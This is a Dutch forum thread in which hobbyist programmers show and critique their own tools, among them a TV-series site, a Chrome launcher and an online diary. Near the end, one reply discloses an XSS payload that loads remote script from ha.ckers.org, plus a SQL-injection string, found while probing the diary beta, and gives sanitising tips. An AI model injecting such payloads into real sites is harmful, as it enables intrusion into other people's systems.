[Alg] Welke tools heb jij gemaakt? - deel III Vorige deel Overzicht Laatste deel

Dit topic is onderdeel van een reeks. Ga naar het meest recente topic in deze reeks.

Pagina: 1 ... 9 10 Laatste
Acties:
  • 95.853 views sinds 30-01-2008

Anoniem: 270857

Marcj schreef op donderdag 14 augustus 2008 @ 09:01:
[...]

Op zich ziet het er leuk uit (al is er nog genoeg te doen), maar die kleuren... In het menu gaat het nog wel, maar vooral in die tabellen... Wit op zo'n licht blauwe achtergrond is gewoon slecht te lezen, en dat heb ik nog relatief goede ogen. Of maak de achtergrond een stuk donkerder, of maak het nog lichter met zwarte letters.

Ook vind ik het jammer dat je een vaste hoogte gebruikt, want nu moet ik scrollen terwijl op mijn scherm veel meer past (bij 1680x1050).
Marcj, kheb speciaal voor jou de lichtste blauw wat donkerder gemaakt (al had ik zelf geen moeite met het lezen) maargoed ik doe het voor de gebruikers he:P.

En over het scrollen ... tjah ik weet niet echt hoe je zo'n photoshop designtje stretch baar kan maken en ik draai toevallig de zelfde resolutie en zoveel scheelt het niet... bij de meeste series zou je alsnog moeten scrollen.

Maar iig bedankt voor de opbouwende critiek.. daar kan ik iig wat mee

• sopsop
  • Registratie: Januari 2002
  • Laatst online: 11:55

sopsop

[v] [;,,;] [v]

Nog wat opmerkingen:
Een serie in het Engels is series. Het is dus "one series" maar ook "two series".

Klikken op 'show all series' geeft een javascript error op
JavaScript:
1
2
3
Spry.Widget.TabbedPanels.prototype.showPanel = function(elementOrIndex)
[..]
panels[tpIndex].style.display = "block";

In IE is de melding: 'style is leeg of geen object'
In FF is de melding: 'panels[tpIndex] is undefined'.

• Marcj
  • Registratie: November 2000
  • Laatst online: 11:59
Anoniem: 270857 schreef op donderdag 14 augustus 2008 @ 13:11:
[...]

Marcj, kheb speciaal voor jou de lichtste blauw wat donkerder gemaakt (al had ik zelf geen moeite met het lezen) maargoed ik doe het voor de gebruikers he:P.

En over het scrollen ... tjah ik weet niet echt hoe je zo'n photoshop designtje stretch baar kan maken en ik draai toevallig de zelfde resolutie en zoveel scheelt het niet... bij de meeste series zou je alsnog moeten scrollen.

Maar iig bedankt voor de opbouwende critiek.. daar kan ik iig wat mee
Ziet er inderdaad iets beter uit :) Al is de kleurstelling nog steed wel iets waar mensen met minder goede ogen moeite mee gaan hebben.

Over de hoogte, waarom wil je per se zo'n kleurovergang? Als je een egale achtergrondkleur kiest kun je de hoogte gewoon variabel maken en dan wordt het scrollen afhankelijk van de resolutie en niet van de website zelf. Nu krijg je met een kleinere monitor extra scrollbalken (wat helemaal een ramp is) en met een grotere (helemaal met een pivot stand) kun je slechts een klein deel gebruiken.

Dan nog een klein functioneel iets: als ik op een actor klik die volgens het overzicht in meerdere series zit (bijvoorbeeld Amanda Bearse), waarom zie ik dan op die detailpagina maar één serie staan?

Daarnaast vind ik zelf de knop 'Forum' niet echt op een logische plek staan en vind ik het ook niet een natuurlijke manier van de topics opbouwen. Ik zag die knop voor het eerst bij de detailsview van een actor en daarna vroeg ik mij serieus af waar ik alle topics zou kunnen zien...

Uiteraard is dit allemaal opbouwende kritiek, want ik vind dat je echt wel een leuk begin hebt gemaakt :)

edit:
Ik zat net even naar je HTML te kijken en daar kun je nog wel een hoop aan verbeteren:

1) Probeer meer gebruik te maken van CSS. Nu definieer je de look&feel in de HTML. Dit wil je van elkaar scheiden.
2) Tables gebruiken voor layout kan echt niet meer.
3) 'Spacer images' kunnen echt niet. Gebruik margin of padding.
4) Probeer alle Javascript te importeren in plaats van in de HTML zetten. Nu worden je pagina's onnodig groot.
5) Probeer alle tags in lowercase te schrijven. Ik zie nu <body> en </BODY>. Als je al hoofdletters gebruikt, wees dan wel consistent.

Wat ik altijd doe is eerst alle informatie die ik in een pagina wil laten zien logisch opdelen in div's, paragrafen, headers, etc. Daarna ga ik een CSS maken die de boel en netjes uit laat zien. Nu heb je het andersom gedaan. Je hebt een layout gemaakt en deze omgezet in HTML. Nu representeert de inhoud van jouw HTML niet alleen de data, maar ook de layout.

Zie verder ook de W3 Validator

[ Voor 24% gewijzigd door Marcj op 14-08-2008 14:02 ]

Tnx voor jullie vele tips, jullie hebben er duidelijk verstand van:).
Ik ben maar een programmeur niet echt een (web)designer, ik voel me ook een stuk meer thuis in java dan php/html vandaar dat het er misschien wat rommelig uitziet.

Ik zal de komende tijd proberen wat van jullie opmerkingen op te lossen, maar van dingen als css gebruiken zie ik nu niet het directe nut in, natuurlijk het verhoogd je onderhoudbaarheid e.d. maar ik heb nu liever eerst dat alles werkt:P. En over de tables layout.. dit is gewoon wat photoshop uitpoept bij save for web en devices. Ik denk niet dat daar iets mis mee is:)\

Edit: een forum index maken staat nog op me to do list... die kan je vinden in 1 van de forum topics... of ik bedoel... die kan je niet vinden in 1 van de forum topics:P

Edit
Dan nog een klein functioneel iets: als ik op een actor klik die volgens het overzicht in meerdere series zit (bijvoorbeeld Amanda Bearse), waarom zie ik dan op die detailpagina maar één serie staan?
In het begin van de site waren er nog wat problemen met de dataminer (die de info van andere databases ophaalt) dus sommige 'linkjes' tussen actors en series zijn dubbel in de database gekomen

[ Voor 33% gewijzigd door Anoniem: 270857 op 14-08-2008 15:10 ]

• Leftblank
  • Registratie: Juni 2004
  • Laatst online: 15:58
Anoniem: 270857 schreef op donderdag 14 augustus 2008 @ 14:23:
Ik zal de komende tijd proberen wat van jullie opmerkingen op te lossen, maar van dingen als css gebruiken zie ik nu niet het directe nut in, natuurlijk het verhoogd je onderhoudbaarheid e.d. maar ik heb nu liever eerst dat alles werkt:P. En over de tables layout.. dit is gewoon wat photoshop uitpoept bij save for web en devices. Ik denk niet dat daar iets mis mee is:)\
Webpages kun je ook met Frontpage 2000 maken, maar de HTML die dat programma genereert is niet bepaald 'netjes' of 'correct' te noemen tegenwoordig, in mindere mate geldt hetzelfde voor Photoshop; een leuk programma om dingen mee te designen, maar dingen als tables zijn niet meer echt van deze tijd, om 't maar kort door de bocht te zeggen ;).

Leftblank schreef op donderdag 14 augustus 2008 @ 14:54:
[...]

Webpages kun je ook met Frontpage 2000 maken, maar de HTML die dat programma genereert is niet bepaald 'netjes' of 'correct' te noemen tegenwoordig, in mindere mate geldt hetzelfde voor Photoshop; een leuk programma om dingen mee te designen, maar dingen als tables zijn niet meer echt van deze tijd, om 't maar kort door de bocht te zeggen ;).
Allright je punt is duidelijk en ik heb zelf ook wat rond gekeken en heb idd gelezen dat tables niet zo handig zijn als layout.. zeker niet als je later nog dingen wilt verplaatsen. Maargoed ik ben nog had aan het sleutelen aan de achterkant van de site dus de layout moet maar even wachten:). Want je kan nog zo'n mooie layerd layout hebben .. als er sql en javascript errors op worden getoont haken mensen toch snel af:P

Anoniem: 260596

Ik heb zonet nog een zeer klein, basisch, eenvoudig applicattietje gemaakt.

Het enige nut is om gemakkelijk de Windows-toets op je klavier de blokkeren/deblokkeren. Lijkt op het eerste zicht nogal dom, maar als je een spel aan het spelen bent wil je niet op het verkeerde moment onderbroken worden door per ongeluk op die toets te drukken.

Het programmaatje kan feitelijk 3 dingen:
- Zeggen of de windows key aan of uit staat. (Enkel na een reboot/re-logg is deze info correct :P)
- Registeraanpassingen maken.
- Windows uitloggen.(Zodat de registeraanpassingen effectief werken)

Ik weet niet of RapidShare hier mag, maag ik houdt graag bij hoevaak het werd gedownload :9

http://rapidshare.com/fil...y-Switch_1.0_by_GuShe.zip

Nja, het is heel eenvoudig, simpel, noobish,.. Maar het is maar om te leren he. :)

Acties:
  • 0 Henk 'm!

• Acid_Burn
  • Registratie: Augustus 2001
  • Laatst online: 17-04 13:46

Acid_Burn

uhuh

Daar heb ik gewoon een knop voor op mijn G15 ;)

Voor de rest kan het wel handig zijn

Glass Eye Photography | Zelfbouw wireless fightstick | Mijn puzzel site

Acties:
  • 0 Henk 'm!

• Webgnome
  • Registratie: Maart 2001
  • Laatst online: 14:49
Leftblank schreef op donderdag 14 augustus 2008 @ 14:54:
[...]

offtopic:
Ik wil hier net een tables vs divs war gaan starten maar mensen die tables helemaal uitbannen puur en alleen omdat de meerderheid dat zegt is natuurlijk goed voorbeeld van schapen gedrag. Tables voor het bepalen van je layout is niet vies het is gewoon niet handig. Wil je echter data gestructureerd op je scherm hebben staan dan ontkom je niet aan tables of aan ontzettend ingewikkelde div /css constructies.

Strava | AP | IP | AW

Acties:
  • 0 Henk 'm!

• pauldegroot
  • Registratie: April 2006
  • Niet online

pauldegroot

silent sounds

Data-base schreef op zaterdag 09 augustus 2008 @ 21:17:
Tijdje geleden bezig geweest met een tooltje om via mn windows mobile telefoon mn multimediacentre te gebruiken. Zodat ik niet die ellendige afstandsbedieningen hoef te gebruiken die maar de helft van de tijd werkt.

Werkt als volgt:
Op de pc draait een tray app, die luistert op een bepaalde ip+poort. Applicatie op telefoon maakt verbinding met de server en wanneer je op bv de play-knop op de telefoon drukt, wordt de play-toets gesimuleerd op de pc.

Heb echter nog geen screenshot of een (goed) werkende versie (na 10 min kapt ie met reageren en moet ik de server herstarten), maar zodra ik tijd heb en het gefixt heb zal ik t laten weten, mochten er geinteresseerden zijn.
Dat is echt een programma dat ik al tijden zoek! Beta tester aangemeldt :+

(Windows Vista x86 met een HTC Prophet WM6.1 Pro)

Acties:
  • 0 Henk 'm!

• link0007
  • Registratie: Augustus 2006
  • Laatst online: 20-05 22:32
Een tijdje geleden www.phunbox.net gemaakt, een website waar mensen bestanden voor een bepaald programma kunnen delen.

Die was nog redelijk eenvoudig en brak kwa opbouw, dus ben nu bezig met een versie 2 :)
Zal alles inzitten van user-accounts tot het samen kunnen werken aan een scene. Ook zal versie 2 via metadetails in de bestanden de titel en beschrijving van het bestand kunnen lezen, en een functie hebben voor plagiaat tegen te gaan. Tags zijn mogelijk, translation files, boel config-values.. Verder ook nog verschillende themes.

Ik zal iig over een paar dagen een fatsoenlijke layout in elkaar zetten zodat alle pagina's die al af zijn ook te bereiken zijn (nu nog een losse hoop pagina's). Dan kan ik hier alvast een blikje in de keuken laten zien, en hopen dat wat kinderziektes gevonden kunnen worden!

IF IF = THEN THEN THEN = ELSE ELSE ELSE = IF;

Acties:
  • 0 Henk 'm!

• Sh4wn
  • Registratie: December 2006
  • Laatst online: 12-11-2017

Sh4wn

Bio-informatica

Pocket Physics Dump

Ik weet niet hoeveel mensen hier bekend zijn met Nintendo DS Homebrew, maar als je dat bent, dan heb je waarschijnlijk wel eens van Pocket Physics gehoord. Pocket Physics is een spel waarbij je zelf iets kan tekenen, en dat die wanneer je op 'play' drukt de door jou getekende wereld gaat simuleren.

De creaties die je hebt gemaakt, kan je ook opslaan, en ik heb een website gemaakt waarbij je jouw creaties kan delen met de rest.

Je vult simpelweg een een titel en beschrijving in, selecteer het bestand, en klik op toevoegen, en je creatie staat er op. Er is ook een web-flash player die de creatie probeert te simuleren, maar die werkt nog niet echt perfect (komt vooral door verschil met fixed/floating point math als ik de maker mag geloven).

Voor mensen zonder flash wordt er een simpel plaatje met de PHP GD extensie die de begin status laat zien.

Je vind de site hier:
http://www.return1.net/site/pp

[ Voor 5% gewijzigd door Sh4wn op 03-09-2008 14:49 ]

Acties:
  • 0 Henk 'm!

• roy-t
  • Registratie: Oktober 2004
  • Laatst online: 10:52
Is dat een soort van Phun voor de ds?

~ Mijn prog blog!

Acties:
  • 0 Henk 'm!

• Sh4wn

Sh4wn

Bio-informatica

roy-t schreef op woensdag 03 september 2008 @ 14:46:
Is dat een soort van Phun voor de ds?
Ehh als ik het zo bekijk, lijkt het er wel beetje op :P Pocket Physics is wel iets simpeler.

Acties:
  • 0 Henk 'm!

• JMfx
  • Registratie: April 2007
  • Laatst online: 12:53
link0007 schreef op vrijdag 29 augustus 2008 @ 20:35:
Een tijdje geleden www.phunbox.net gemaakt, een website waar mensen bestanden voor een bepaald programma kunnen delen.

Die was nog redelijk eenvoudig en brak kwa opbouw, dus ben nu bezig met een versie 2 :)
Zal alles inzitten van user-accounts tot het samen kunnen werken aan een scene. Ook zal versie 2 via metadetails in de bestanden de titel en beschrijving van het bestand kunnen lezen, en een functie hebben voor plagiaat tegen te gaan. Tags zijn mogelijk, translation files, boel config-values.. Verder ook nog verschillende themes.

Ik zal iig over een paar dagen een fatsoenlijke layout in elkaar zetten zodat alle pagina's die al af zijn ook te bereiken zijn (nu nog een losse hoop pagina's). Dan kan ik hier alvast een blikje in de keuken laten zien, en hopen dat wat kinderziektes gevonden kunnen worden!
Ik krijg de volgende error: not a .phn or .cfg file! Ik mis wel een goede gratis file upload zonder counters die intuitief te gebruiken is.

• Delvi
  • Registratie: November 2002
  • Laatst online: 11-02 14:39
sig69 schreef op dinsdag 22 juli 2008 @ 12:26:
Sinds een tijdje kunnen we bij mijn lokale squash centrum via internet banen reserver, maar omdat ik dit regelmatig vergeet en we dan geen banen hebben op de drukste avond van de week ben ik er maar ff voor gaan zitten... Resultaat:
• Een windows service die elke nacht om 0:00:01 controleert of hij banen moet reserveren voor de week erop.
• Elke week gegarandeerd twee squashbanen >:)
Heb geen screenshots want het is een windows service :)
He sig69,
We hebben hier sinds kort ook zo'n site (via baanreserveren.nl). En ook wij vergeten wel eens op tijd te boeken.
Nu bedacht ik me laatst dat ik jouw proggie hier voorbij kwam en was benieuwd of je hem zou willen delen met me? eventueel met code? Kan ik er nog wat van leren ook!!

Laat het me maar ff weten

You can make your program idiot prove. Then someone will develop a better idiot

• sig69
  • Registratie: Mei 2002
  • Laatst online: 15:57
Dat hangt er vanaf waar je squashed natuurlijk ;)

Roomba E5 te koop

• Delvi
Hahahaha
Ik squash in Hoorn (Noord Holland), ongeveer 75km bij je vandaan. Dus je zal geen last van me hebben!!

Acties:
  • 0 Henk 'm!

• sig69
Heel goed. Ik zal kijken of ik komende week ergens tijd heb om alles bij elkaar te zoeken. Ik heb heb het een beetje druk de laatste tijd dus het kan misschien even duren...

Roomba E5 te koop

Acties:
  • 0 Henk 'm!

• Delvi
Top!!

Ik wacht het wel ff af.
Banen voor volgende week zijn al geboekt ;) ;)

Acties:
  • 0 Henk 'm!

• RetroTycoon
  • Registratie: Juli 2008
Ik heb hier net een roosteruploader afgerond die (a) je rooster upload ;) en (b) de desbetreffende pagina van links en ons leuke HWW-logo voorziet (goed voor je regex skills, want die had ik nog niet :P). Uiteraard wordt aan file-checking gedaan (op mime-type en filesize), maar voor de rest wordt, zoals bij de uitleg van de verborgen pagina, een beroep gedaan op goed vertrouwen.
Ook heb ik een roosteroverzicht ingebakken, dat van een bestaand script afkomstig is, om je rooster weer snel terug te vinden (ik ga ook geen werk verrichten dat al gedaan is :))

Nut? Nu mijn klas ergens in de 4e 'rondzwerft' en dus bovenbouw is, hebben we geen klassen meer en dus ook geen klassenrooster. Om toch iedereen de kans te geven het een alternatieve locatie te geven (wat ook het doel van de HWW is 8), want dit hét alternatief tegen TeleTOP), heb ik een roosteruploader gemaakt met bovenstaand doel :Y)

Linkjes
Uploader: http://l3ga.site40.net/r (=beveiligd. Maar hier een plaatje!)
En roosteroverzicht (is een van internet geplukt script en pietsie aangepast): http://l3ga.site40.net/ru (niet beveiligd)

Ooh ja, onze HWW (gebaseerd op MediaWiki met hier en daar wat aangepaste code, want hé, je bent tweaker of je bent het niet ;))? Check de HuiswerkWiki: http://l3ga.tk

/edit volgens mij m'n langste post tot nu toe :)

Acties:
  • 0 Henk 'm!

• Sh4wn

Sh4wn

Bio-informatica

RetroTycoon schreef op vrijdag 05 september 2008 @ 18:26:
Ik heb hier net een roosteruploader afgerond die (a) je rooster upload ;) en (b) de desbetreffende pagina van links en ons leuke HWW-logo voorziet (goed voor je regex skills, want die had ik nog niet :P). Uiteraard wordt aan file-checking gedaan (op mime-type en filesize), maar voor de rest wordt, zoals bij de uitleg van de verborgen pagina, een beroep gedaan op goed vertrouwen.
Ook heb ik een roosteroverzicht ingebakken, dat van een bestaand script afkomstig is, om je rooster weer snel terug te vinden (ik ga ook geen werk verrichten dat al gedaan is :))

Nut? Nu mijn klas ergens in de 4e 'rondzwerft' en dus bovenbouw is, hebben we geen klassen meer en dus ook geen klassenrooster. Om toch iedereen de kans te geven het een alternatieve locatie te geven (wat ook het doel van de HWW is 8), want dit hét alternatief tegen TeleTOP), heb ik een roosteruploader gemaakt met bovenstaand doel :Y)

Linkjes
Uploader: http://l3ga.site40.net/r (=beveiligd. Maar hier een plaatje!)
En roosteroverzicht (is een van internet geplukt script en pietsie aangepast): http://l3ga.site40.net/ru (niet beveiligd)

Ooh ja, onze HWW (gebaseerd op MediaWiki met hier en daar wat aangepaste code, want hé, je bent tweaker of je bent het niet ;))? Check de HuiswerkWiki: http://l3ga.tk

/edit volgens mij m'n langste post tot nu toe :)
offtopic:
Staring, mijn oude school, ben afgelopen jaar geslaagd :+

Ik snap alleen nog steeds niet het nut van de rooster uploader? Je kan overal waar internet is op het staring intranet, en dan je rooster bekijken?

Acties:
  • 0 Henk 'm!

• sig69
Delvi schreef op vrijdag 05 september 2008 @ 13:09:
Top!!

Ik wacht het wel ff af.
Banen voor volgende week zijn al geboekt ;) ;)
Kan je je direct messages even aanzetten?

Roomba E5 te koop

Acties:
  • 0 Henk 'm!

• Delvi
Oke, Done!!
Ben wel ff nieuwsgierig!

Acties:
  • 0 Henk 'm!

• RetroTycoon
  • Registratie: Juli 2008
Sh4wn schreef op maandag 08 september 2008 @ 16:14:
[...]

offtopic:
Staring, mijn oude school, ben afgelopen jaar geslaagd :+

Ik snap alleen nog steeds niet het nut van de rooster uploader? Je kan overal waar internet is op het staring intranet, en dan je rooster bekijken?
Dan hadden we ook geen HWW nodig als je zo denkt (nofi btw): je hebt een agenda, TeleTOP (dat zul je ongetwijfeld kennen :P), en het intranet... Het gaat ons erom dat het ergens alternatief (zonder noodzaak om in te loggen en up-to-date zoals TT dat bijvoorbeeld vaak niet is) beschikbaar is... Omdat de HWW een totaaloplossing probeerd (we doen een poging daratoe ;)) te zijn, hoort daar natuurlijk een roosteruploader bij :)

offtopic:
Iets dat de leerlingen zelf maken is helemaal aangepast aan de leerlingen en werkt waarschijnlijk daarom doeltreffender :Y)

• Sh4wn

Sh4wn

Bio-informatica

RetroTycoon schreef op dinsdag 09 september 2008 @ 17:38:
[...]

Dan hadden we ook geen HWW nodig als je zo denkt (nofi btw): je hebt een agenda, TeleTOP (dat zul je ongetwijfeld kennen :P), en het intranet... Het gaat ons erom dat het ergens alternatief (zonder noodzaak om in te loggen en up-to-date zoals TT dat bijvoorbeeld vaak niet is) beschikbaar is... Omdat de HWW een totaaloplossing probeerd (we doen een poging daratoe ;)) te zijn, hoort daar natuurlijk een roosteruploader bij :)

offtopic:
Iets dat de leerlingen zelf maken is helemaal aangepast aan de leerlingen en werkt waarschijnlijk daarom doeltreffender :Y)
Ah ok :P Daarvoor is het idd wel handig :)

• Sebazzz
  • Registratie: September 2006
  • Laatst online: 20-05 09:31

Sebazzz

3dp

ChromeLauncher / Chrome Portable
Afbeeldingslocatie: http://c.imagehost.org/0720/ChromeLogo.png
Google Chrome neemt altijd aan dat het profiel in Local Settings staat. Dat is goed voor je eigen computer, maar als je Chrome portable maakt gaat dat niet goed. Daarom deze Launcher, deze kopieert voor gebruik de profiel map naar Local Settings van de gebruiker en kan na gebruik van Google Chrome het profiel synchroniseren en / of verwijderen van de lokale hoofdcomputer. Zo blijft er geen troep achter. Zie instructies.txt voor installatie en gebruiksinstructies. Je wilt waarschijnlijk ook wel de instellingen van de launcher in ChromePortable.ini aanpassen.

Requirements:
- Windows 2000 of hoger;
- Microsoft .NET 2.0 of hoger (zit meegeleverd bij Windows XP standaard).

Downloaden:
- 7-zip ingepakt;
- Zelfuitpakkend archief.

[ Voor 35% gewijzigd door Sebazzz op 11-09-2008 08:23 ]

[Te koop: 3D printers] [Website] Agile tools: [Return: retrospectives] [Pokertime: planning poker]

• pietje63
  • Registratie: Juli 2001
  • Laatst online: 14:25

pietje63

RTFM

Sebazzz, volgens mij is Chrome open source (kleine google levert mij http://dev.chromium.org/developers op) wellicht is het een idee om een aangepaste build van chrome te maken, i.p.v. een launcher. Nadeel is dan inderdaad wel dat je dit elke keer bij een nieuwe chrome build bij moet werken..

De grootste Nederlandstalige database met informatie over computers met zoekfunctie!!

• Sebazzz

Sebazzz

3dp

Daarom deze launcher. Dan ben je altijd verzekerd van de laatste Chrome.

[Te koop: 3D printers] [Website] Agile tools: [Return: retrospectives] [Pokertime: planning poker]

• AtleX
  • Registratie: Maart 2003
  • Niet online

AtleX

Tyrannosaurus Lex 🦖

.NET 2.0 zit niet standaard in Windows XP!

• Storme
  • Registratie: December 2004
  • Laatst online: 26-04 08:42
AtleX schreef op donderdag 11 september 2008 @ 08:31:
.NET 2.0 zit niet standaard in Windows XP!
Vanaf service pack 2 wel :)

• Sebazzz

Sebazzz

3dp

En je mag er vanuit gaan dat qua beveiliging Jan Modaal de laatste updates heeft (omdat MS dat pusht) en een school ook de laatste updates heeft (vanwege andere redenen :+ ).

• Webgnome
  • Registratie: Maart 2001
  • Laatst online: 14:49

HockeyManager Mobile

De afgelopen paar maanden ben ik bezig geweest in mijn vrije tijd met een programma voor mijn hobby. Rolstoelhockey. De website die vanuit de overkoepelende organisatie bijgehouden wordt , en dus alle informatie bevat zoals de laatste standen en dergelijke, wordt niet altijd even snel geupdate. Ik begon me er een beetje aan te ergeren en dacht bij mezelf. Wat nou als ik een programma maak waarmee ik tijdens een competitiedag de uitslagen van die dag kan bij houden zodat ik deze informatie direct op de website kan zetten met een druk op de knop. Na een beetje gebrainstormed te hebben had ik het perfecte plan. Ik maak een J2ME applicatie waarmee wedstrijden, teams en competities kunnen worden bij gehouden, die zijn informatie van een server haalt (via gprs) en ook weer daar heen verstuurd als er iets is veranderd. Zo kan ik , mits er GRPRS beschikbaar is, altijd de laatste standen submitten naar de database door gebruik making van XML requests naar de server. Omdat ik mijn telefoon toch altijd bij de hand heb leek mij dit de meest logische oplossing.

Dit project is nu in zijn eerste vorm en het werkt. De functies:
  • Teams aanmaken, aanpassen en ook weer verwijderen
  • Competities aanmaken etc.
  • Wedstrijden idem
  • Ranglijst van een bepaalde klasse zien zodat je altijd kunt zien hoe een team ervoor staat.
  • Gegevens versturen / ontvangen van een ' rest ' service.
Known bugs
  • bij het afsluiten van de applicatie wordt niet gekeken of gegevens al zijn verstuurd of aangepast sinds laatste send actie. Die zijn dan dus gewoon kwijt.
  • Bij het versturen/ontvangen van gegeven eerst eventjes de instellingen aanpassen item openen en saven omdat het configuratie object nog niet goed wordt geïnitialiseerd.
Ik heb tijdens het project me alles behalve gericht op de gui. Heb dus gebruik gemaakt van de standaard lcdui elementen waaromhet er allemaal een beetje oubollig uitziet. Echter hierdoor weet ik wel 99,9% zeker dat het wat betreft werkt op alle telefoons aangezien dit core objecten zijn van J2ME.

Voor diegene die het op hun telefoon willen uittesten. Dit zijn de benodigdheden:

Requirements
- GPRS verbinding ( eventueel een flat-fee of hoe dat ook heet abbo)
- Minimaal Midp 2.0 en CLDC 1.1 compatible JVM.

Download

Hockeymanager.zip
Source

Toekomst

Nadat de nog te vinden bugs zijn geplet ga ik me richten op een Website versie van dit systeem waarbij ik dezelfde functionaliteit ga maken als in de telefoon versie maar dan ook ondersteunen van spelers binnen een team zodat er gegevens kunnen worden opgeslagen van topscoorder en dat soort leuke statistieken. Hiervoor zal dan ook de telefoonversie aangepast moeten worden. Maar dat zien we dan wel weer.

Daarnaast heb ik ook nog het idee om een Eclipse versie van dit geheel te maken waarbij ik ook gebruik maak van de rest service om gegevens te synchronizeren.

En natuurlijk.. de telefoonversie gaat ook daadwerkeljik door mij worden gebruikt tijdens wedstrijd dagen zodat ik door mijn eigen wedstrijden door de andere wedstrijden kan bijhouden.

De Source

De source kan hier en daar nogal rommelig overkomen. Zo is er nagenoeg nog geen javadoc en heb ik in de java files geen history bijgehouden aangezien ik dit via CVS doe. Als je op/aanmerkingen hebt over de source dan zie / hoor ik die graag.

offtopic:
Mocht er iemand zijn die ook rolstoelhockey speelt. Ik speel zelf bij de Arnhemse Antilopen H1

[ Voor 10% gewijzigd door Webgnome op 17-09-2008 23:26 ]

Strava | AP | IP | AW

Acties:
  • 0 Henk 'm!

• sopsop
  • Registratie: Januari 2002
  • Laatst online: 11:55

sopsop

[v] [;,,;] [v]

Webgnome schreef op woensdag 17 september 2008 @ 23:16:
[...]
offtopic:
[..] Arnhemse Antilopen H1
Geniale naam :D

Acties:
  • 0 Henk 'm!

• DennusB
  • Registratie: Mei 2006
  • Niet online
Heb een website applicatie gebouwd :)
Your Online Diary heet het, zoals je aan de naam kan zien al, kan je hier online je dagboek bijhouden.
Waar ook ter wereld uiteraard, je kan reminders krijgen wanneer je het bent vergeten in te vullen.
We zitten nog in de beta-test-fase, maar het zou leuk zijn als jullie al wat kunnen vertellen erover, vinden jullie het wat, tips/features die je wil zien?

de site is nu nog:
www.brouwernetwork.nl/dagboek/

Zodra het gaat lopen verhuizen we direct naar www.youronlinediary.nl :)

Owner of DBIT Consultancy

Acties:
  • 0 Henk 'm!

• link0007
DennusB schreef op zaterdag 04 oktober 2008 @ 21:24:
Heb een website applicatie gebouwd :)
Your Online Diary heet het, zoals je aan de naam kan zien al, kan je hier online je dagboek bijhouden.
Waar ook ter wereld uiteraard, je kan reminders krijgen wanneer je het bent vergeten in te vullen.
We zitten nog in de beta-test-fase, maar het zou leuk zijn als jullie al wat kunnen vertellen erover, vinden jullie het wat, tips/features die je wil zien?

de site is nu nog:
www.brouwernetwork.nl/dagboek/

Zodra het gaat lopen verhuizen we direct naar www.youronlinediary.nl :)
ik heb me even geregistreerd met de naam ' ' (zonder aanhalingstekens)

Toen heb ik een dagboek aangemaakt met de titel ' ' (zonder aanhalingstekens), en nu heb ik geen toegang tot dat dagboek? :(

Ook kon ik een xss inject doen door middel van deze code:
code:
1
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

die ik als titel van het dagboek gezet had. Kijk voor meer testvoorbeelden op http://ha.ckers.org/xss.html

Moraal van het verhaal:

- trim al je string input voor je kijkt of ze leeg zijn
- sta geen lege input toe
- sta geen onnodig lange input toe (een gebruikersnaam van 1000000 tekens bijvoorbeeld, of bij een fotoalbum een fotos-per-pagina limiet van 99999)
- maak je input altijd veilig
- zorg ervoor dat <> nooit als echte <> blijven staan, maar verander ze in < en >

:)

Acties:
  • 0 Henk 'm!

• Bozozo
  • Registratie: Januari 2005
  • Laatst online: 20-02 16:10

Bozozo

Your ad here?

Die laatste zin is een beetje vreemd Link :P. Je hebt waarschijnlijk & gt; en & lt; getikt zonder spatie na de ampersand O-)

TabCinema : NiftySplit

Acties:
  • 0 Henk 'm!

• AtleX
  • Registratie: Maart 2003
  • Niet online

AtleX

Tyrannosaurus Lex 🦖

Zonder spatie kan ook: &gt; en &lt;

Acties:
  • 0 Henk 'm!

• link0007
Bozozo schreef op zondag 05 oktober 2008 @ 09:37:
Die laatste zin is een beetje vreemd Link :P. Je hebt waarschijnlijk & gt; en & lt; getikt zonder spatie na de ampersand O-)
Klopt 8)7 Was ook al laat, dus ik heb een excuus :+

Maar mijn punt blijft geldig.. Ombouwen naar entities is IMO nog steeds de beste beveiliging die er is (zowel tegen XSS, als tegen sql injections).

Het belemert je ook niet, omdat iemand gewoon kan zoeken naar 'hallo', of naar " OR 1=1--, want er staat dan gewoon &#39;hallo&#39; en &#34; OR 1=1-- staat :)

[ Voor 14% gewijzigd door link0007 op 05-10-2008 13:47 ]

Acties:
  • 0 Henk 'm!

• Snake
  • Registratie: Juli 2005
  • Laatst online: 07-03-2024

Snake

Los Angeles, CA, USA

Ik heb hier een app geschreven die een snelkoppeling plaatst in Send To map, als vervanging van de Mail Recipient van Vista.

Het vraagt dan niet voor de foto te resizen, en het maakt gewoon een HTML mailtje aan, ipv een tekst mailtje.

1 probleem momenteel: de installatie plaatst een Advertised Shortcut in de Send To map, en daarvoor weet ik niet direct een oplossing, zodra ik die heb, post ik hier de source.

Woei oplossing gevonden :P Even wat bloggen, post het hier wel.

Blog geupdated.

[ Voor 15% gewijzigd door Snake op 05-10-2008 17:19 ]

Going for adventure, lots of sun and a convertible! | GMT-8

Acties:
  • 0 Henk 'm!

• NMe
  • Registratie: Februari 2004
  • Laatst online: 01-05 10:36

NMe

Quia Ego Sic Dico.

Topicstarter
Omdat we aan het werken zijn aan een nieuwe FAQ waar dit topic ook in genoemd wordt en ik geen zin heb om volgende week alweer in die FAQ te moeten editen omdat dit topic een nieuw deel krijgt doe ik deze vast op slot voor het nieuwe deel. :Y)

[Alg] Welke tools heb jij gemaakt? - deel IV

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

Pagina: 1 ... 9 10 Laatste

Dit topic is gesloten.

Let op:
Dit topic is alleen bedoeld om zelfgemaakte tools te showen en te bespreken. Net als in de rest van Programming is het hier dus ook niet toegestaan om 'even te vragen of iemand iets kan maken'. Dit is een forum over zelf programmeren, geen McDonalds afhaalbalie voor lappen code of software.